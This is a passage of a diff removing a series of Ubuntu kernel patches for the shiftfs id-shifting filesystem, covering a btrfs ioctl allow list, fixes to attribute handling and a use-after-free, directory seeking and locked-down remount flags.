--			goto out_put;
--		mp_ssi = path.dentry->d_sb->s_fs_info;
--		if (!mp_ssi->mark)
--			goto out_put;
--		ssi->mnt = mntget(mp_ssi->mnt);
-+			goto out_put_path;
-+
-+		sbinfo_mp = path.dentry->d_sb->s_fs_info;
-+		if (!sbinfo_mp->mark)
-+			goto out_put_path;
-+
-+		if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+					   sbinfo->passthrough))
-+			goto out_put_path;
-+
-+		sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		path_put(&path);
-+		sbinfo->info_mark = sbinfo_mp;
-+	}
-+
-+	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put_path;
-+	}
-+
-+	inode = new_inode(sb);
-+	if (!inode) {
-+		err = -ENOMEM;
-+		goto out_put_path;
- 	}
--	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
--	sb->s_fs_info = ssi;
-+	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
-+
-+	ihold(dentry->d_inode);
-+	inode->i_private = dentry->d_inode;
-+
- 	sb->s_magic = SHIFTFS_MAGIC;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_flags |= SB_POSIXACL;
-+	sb->s_root = d_make_root(inode);
-+	if (!sb->s_root) {
-+		err = -ENOMEM;
-+		goto out_put_path;
-+	}
-+
- 	sb->s_root->d_fsdata = dentry;
-+	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
- 
--	return 0;
-+	dentry = NULL;
-+	err = 0;
- 
-- out_put:
-+out_put_path:
- 	path_put(&path);
-- out:
-+
-+out_free_name:
- 	kfree(name);
--	kfree(ssi);
-+
-+	dput(dentry);
-+
- 	return err;
- }
- 
-@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
-+	shiftfs_file_info_cache = kmem_cache_create(
-+		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
-+		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+	if (!shiftfs_file_info_cache)
-+		return -ENOMEM;
-+
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
-+	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
- MODULE_AUTHOR("James Bottomley");
--MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
-+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
-+MODULE_DESCRIPTION("id shifting filesystem");
- MODULE_LICENSE("GPL v2");
- module_init(shiftfs_init)
- module_exit(shiftfs_exit)
--- 
-2.39.2
-
-From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:13 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-Shiftfs currently only passes through a few ioctl()s to the underlay. These
-are ioctl()s that are generally considered safe. Doing it for random
-ioctl()s would be a security issue. Permissions for ioctl()s are not
-checked before the filesystem gets involved so if we were to override
-credentials we e.g. could do a btrfs tree search in the underlay which we
-normally wouldn't be allowed to do.
-However, the btrfs filesystem allows unprivileged users to perform various
-operations through its ioctl() interface. With shiftfs these ioctl() are
-currently not working. To not regress users that expect btrfs ioctl()s to
-work in unprivileged containers we can create a whitelist of ioctl()s that
-we allow to go through to the underlay and for which we also switch
-credentials.
-The main problem is how we switch credentials. Since permissions checks for
-ioctl()s are
-done by the actual file system and not by the vfs this would mean that any
-additional capable(<cap>)-based checks done by the filesystem would
-unconditonally pass after we switch credentials. So to make credential
-switching safe we drop *all* capabilities when switching credentials. This
-means that only inode-based permission checks will pass.
-
-Btrfs also allows unprivileged users to delete snapshots when the
-filesystem is mounted with user_subvol_rm_allowed mount option or if the
-the callers is capable(CAP_SYS_ADMIN). The latter should never be the case
-with unprivileged users. To make sure we only allow removal of snapshots in
-the former case we drop all capabilities (see above) when switching
-credentials.
-
-Additonally, btrfs allows the creation of snapshots. To make this work we
-need to be (too) clever. When doing snapshots btrfs requires that an fd to
-the directory the snapshot is supposed to be created in be passed along.
-This fd obviously references a shiftfs file and as such a shiftfs dentry
-and inode.  This will cause btrfs to yell EXDEV. To circumnavigate this
-problem we need to silently temporarily replace the passed in fd with an fd
-that refers to a file that references a btrfs dentry and inode.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 151 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index ad1ae5bce6c1..678cad30f4a5 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,6 +1,8 @@
-+#include <linux/btrfs.h>
- #include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
-+#include <linux/fdtable.h>
- #include <linux/file.h>
- #include <linux/fs.h>
- #include <linux/namei.h>
-@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 
- #define SHIFTFS_PASSTHROUGH_NONE 0
- #define SHIFTFS_PASSTHROUGH_STAT 1
--#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+#define SHIFTFS_PASSTHROUGH_IOCTL 2
-+#define SHIFTFS_PASSTHROUGH_ALL                                                \
-+	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
-+
-+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	return true;
-+}
- 
- static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- {
-@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
- 	return shiftfs_revert_object_creds(oldcred, newcred);
- }
- 
-+static inline bool is_btrfs_snap_ioctl(int cmd)
-+{
-+	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
-+		return true;
-+
-+	return false;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
-+					  void __user *arg,
-+					  struct btrfs_ioctl_vol_args *v1,
-+					  struct btrfs_ioctl_vol_args_v2 *v2)
-+{
-+	int ret;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE)
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+	else
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+
-+	fdput(lfd);
-+	__close_fd(current->files, fd);
-+	kfree(v1);
-+	kfree(v2);
-+
-+	return ret;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-+					  struct btrfs_ioctl_vol_args **b1,
-+					  struct btrfs_ioctl_vol_args_v2 **b2,
-+					  struct fd *lfd,
-+					  int *newfd)
-+{
-+	int oldfd, ret;
-+	struct fd src;
-+	struct btrfs_ioctl_vol_args *v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1 = memdup_user(arg, sizeof(*v1));
-+		if (IS_ERR(v1))
-+			return PTR_ERR(v1);
-+		oldfd = v1->fd;
-+		*b1 = v1;
-+	} else {
-+		v2 = memdup_user(arg, sizeof(*v2));
-+		if (IS_ERR(v2))
-+			return PTR_ERR(v2);
-+		oldfd = v2->fd;
-+		*b2 = v2;
-+	}
-+
-+	src = fdget(oldfd);
-+	if (!src.file)
-+		return -EINVAL;
-+
-+	ret = shiftfs_real_fdget(src.file, lfd);
-+	fdput(src);
-+	if (ret)
-+		return ret;
-+
-+	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	if (*newfd < 0) {
-+		fdput(*lfd);
-+		return *newfd;
-+	}
-+
-+	fd_install(*newfd, lfd->file);
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1->fd = *newfd;
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+		v1->fd = oldfd;
-+	} else {
-+		v2->fd = *newfd;
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+		v2->fd = oldfd;
-+	}
-+
-+	if (ret)
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+
-+	return ret;
-+}
-+
- static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 			       unsigned long arg)
- {
--	long ret = 0;
- 	struct fd lowerfd;
- 	struct cred *newcred;
- 	const struct cred *oldcred;
-+	int newfd = -EBADF;
-+	long err = 0, ret = 0;
-+	void __user *argp = (void __user *)arg;
-+	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
-+	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
-+
-+	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
-+					     &btrfs_lfd, &newfd);
-+	if (ret < 0)
-+		return ret;
- 
- 	ret = shiftfs_real_fdget(file, &lowerfd);
- 	if (ret)
--		return ret;
-+		goto out_restore;
- 
- 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
- 	if (ret)
-@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- out_fdput:
- 	fdput(lowerfd);
- 
-+out_restore:
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+					     btrfs_v1, btrfs_v2);
-+	if (!ret)
-+		ret = err;
-+
- 	return ret;
- }
- 
-+static bool in_ioctl_whitelist(int flag)
-+{
-+	switch (flag) {
-+	case BTRFS_IOC_SNAP_CREATE:
-+		return true;
-+	case BTRFS_IOC_SNAP_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SNAP_DESTROY:
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
- static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 			  unsigned long arg)
- {
-@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		return -ENOTTY;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOTTY;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
-@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		return -ENOIOCTLCMD;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOIOCTLCMD;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
--- 
-2.39.2
-
-From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Thu, 11 Apr 2019 07:31:04 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower
- fs attrs
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824350
-
-shiftfs_setattr() is preparing a new set of attributes with the
-owner translated for the lower fs, but it then passes the
-original attrs. As a result the owner is set to the untranslated
-owner, which causes the shiftfs inodes to also have incorrect
-ids. For example:
-
- # mkdir dir
- # touch file
- # ls -lh dir file
- drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
- -rw-r--r-- 1 root root 0 Apr 11 13:05 file
- # chown 500:500 dir file
- # ls -lh dir file
- drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
- -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
-
-Fix this to pass the correct iattr struct to notify_change().
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 678cad30f4a5..e736fd6afcb4 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, attr, NULL);
-+	err = notify_change(lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
--- 
-2.39.2
-
-From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Sat, 13 Apr 2019 14:41:01 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for
- setattr
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824717
-
-shiftfs_setattr() makes a copy of the attrs it was passed to pass
-to the lower fs. It then calls setattr_prepare() with the original
-attrs, and this may make changes which are not reflected in the
-attrs passed to the lower fs. To fix this, copy the attrs to the
-new struct for the lower fs after calling setattr_prepare().
-
-Additionally, notify_change() may have set ATTR_MODE when one of
-ATTR_KILL_S[UG]ID is set, and passing this combination to
-notify_change() will trigger a BUG(). Do as overlayfs and
-ecryptfs both do, and clear ATTR_MODE if either of those bits
-is set.
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
-Acked-by: Brad Figg <brad.figg@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e736fd6afcb4..8e064756ea0c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
--	struct iattr newattr = *attr;
-+	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
-@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	if (err)
- 		return err;
- 
-+	newattr = *attr;
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
-+	/*
-+	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-+	 * to interpret this in its own way.
-+	 */
-+	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
-+		newattr.ia_valid &= ~ATTR_MODE;
-+
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	err = notify_change(lowerd, &newattr, NULL);
--- 
-2.39.2
-
-From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Mon, 15 Apr 2019 15:21:55 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
- mount options
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824735
-
-Copy up the passthrough mount settings of the mark mount point to the
-shiftfs overlay.
-
-Before this commit we used to keep a reference to the shiftfs mark
-mount's shiftfs_super_info which was stashed in the superblock of the
-mark mount. The problem is that we only take a reference to the mount of
-the underlay, i.e. the filesystem that is *under* the shiftfs mark
-mount. This means when someone performs a shiftfs mark mount, then a
-shiftfs overlay mount and then immediately unmounts the shiftfs mark
-mount we muck with invalid memory since shiftfs_put_super might have
-already been called freeing that memory.
-
-Another solution would be to start reference counting. But this would be
-overkill. We only care about the passthrough mount option of the mark
-mount. And we only need it to verify that on remount the new passthrough
-options of the shiftfs overlay are a subset of the mark mount's
-passthrough options. In other scenarios we don't care. So copying up is
-good enough and also only needs to happen once on mount, i.e. when a new
-superblock is created and the .fill_super method is called.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 29 ++++++++++++++++++-----------
- 1 file changed, 18 insertions(+), 11 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8e064756ea0c..4c8a6ec2a617 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -28,7 +28,7 @@ struct shiftfs_super_info {
- 	const struct cred *creator_cred;
- 	bool mark;
- 	unsigned int passthrough;
--	struct shiftfs_super_info *info_mark;
-+	unsigned int passthrough_mark;
- };
- 
- struct shiftfs_file_info {
-@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
--		return false;
--
- 	return true;
- }
- 
-@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
--		return false;
--
- 	return true;
- }
- 
-@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 
- 	if (info->passthrough != new.passthrough) {
- 		/* Don't allow exceeding passthrough options of mark mount. */
--		if (!passthrough_is_subset(info->info_mark->passthrough,
-+		if (!passthrough_is_subset(info->passthrough_mark,
- 					   info->passthrough))
- 			return -EPERM;
- 
-@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 
- 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 			dentry = dget(path.dentry->d_fsdata);
-+			/*
-+			 * Copy up the passthrough mount options from the
-+			 * parent mark mountpoint.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-+			/*
-+			 * For a new mark passthrough_mark and passthrough
-+			 * are identical.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
- 		sbinfo->creator_cred = prepare_creds();
-@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		sbinfo->info_mark = sbinfo_mp;
-+		/*
-+		 * Copy up passthrough settings from mark mountpoint so we can
-+		 * verify when the overlay wants to remount with different
-+		 * passthrough settings.
-+		 */
-+		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
--- 
-2.39.2
-
-From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 16 Apr 2019 18:29:00 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
- directories
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824812
-
-Give shiftfs it's own proper llseek method for directories.
-
-Before this commit we used to rely on an llseek method that was
-targeted for regular files for both directories and regular files.
-However, the realfile's f_pos was not correctly handled when userspace
-called lseek(2) on a shiftfs directory file. Give directories their
-own llseek operation so that seeking on a directory file is properly
-supported.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4c8a6ec2a617..9771165d1ce0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
- 	return 0;
- }
- 
--static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	return vfs_llseek(realfile, offset, whence);
-+}
-+
-+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
- {
- 	struct inode *realinode = file_inode(file)->i_private;
- 
-@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- const struct file_operations shiftfs_file_operations = {
- 	.open			= shiftfs_open,
- 	.release		= shiftfs_release,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_file_llseek,
- 	.read_iter		= shiftfs_read_iter,
- 	.write_iter		= shiftfs_write_iter,
- 	.fsync			= shiftfs_fsync,
-@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_dir_llseek,
- 	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
- 	.release		= shiftfs_release,
--- 
-2.39.2
-
-From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Wed, 8 May 2019 14:13:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1827122
-
-This locks down various superblock flags to prevent userns-root from
-remounting a superblock with less restrictive options than the original
-mark or underlay mount.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
- 1 file changed, 46 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9771165d1ce0..a1dae7ea593b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
- 	return true;
- }
- 
-+static int shiftfs_super_check_flags(unsigned long old_flags,
-+				     unsigned long new_flags)
-+{
-+	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
-+		return -EPERM;
-+
-+	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
- static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- {
- 	int err;
-@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 	if (err)
- 		return err;
- 
-+	err = shiftfs_super_check_flags(sb->s_flags, *flags);
-+	if (err)
-+		return err;
-+
- 	/* Mark mount option cannot be changed. */
- 	if (info->mark || (info->mark != new.mark))
- 		return -EPERM;
-@@ -1847,6 +1878,16 @@ struct shiftfs_data {
- 	const char *path;
- };
- 
-+static void shiftfs_super_force_flags(struct super_block *sb,
-+				      unsigned long lower_flags)
-+{
-+	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
-+				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
-+
-+	if (!(lower_flags & SB_POSIXACL))
-+		sb->s_flags &= ~SB_POSIXACL;
-+}
-+
- static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			      int silent)
- {
-@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	sb->s_flags |= SB_POSIXACL;
-+
- 	if (sbinfo->mark) {
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
-@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
- 
-+		shiftfs_super_force_flags(sb, lower_sb->s_flags);
-+
- 		/*
- 		 * Handle nesting of shiftfs mounts by referring this mark
- 		 * mount back to the original mark mount. This is more
-@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 * passthrough settings.
- 		 */
- 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
-+		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_flags |= SB_POSIXACL;
- 	sb->s_root = d_make_root(inode);
- 	if (!sb->s_root) {
- 		err = -ENOMEM;
--- 
-2.39.2
-
-From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 11 Jun 2019 11:47:35 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1832316
-
-This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
-
-Currently, btrfs workloads employing shiftfs cause regression.
-With btrfs unprivileged users can already toggle whether a subvolume
-will be ro or rw. This is broken on current shiftfs as we haven't
-whitelisted these ioctls().
-To prevent such regression, we need to whitelist the ioctls
-BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
-BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
-users.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Cc: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 21 ++++++++++++++++++---
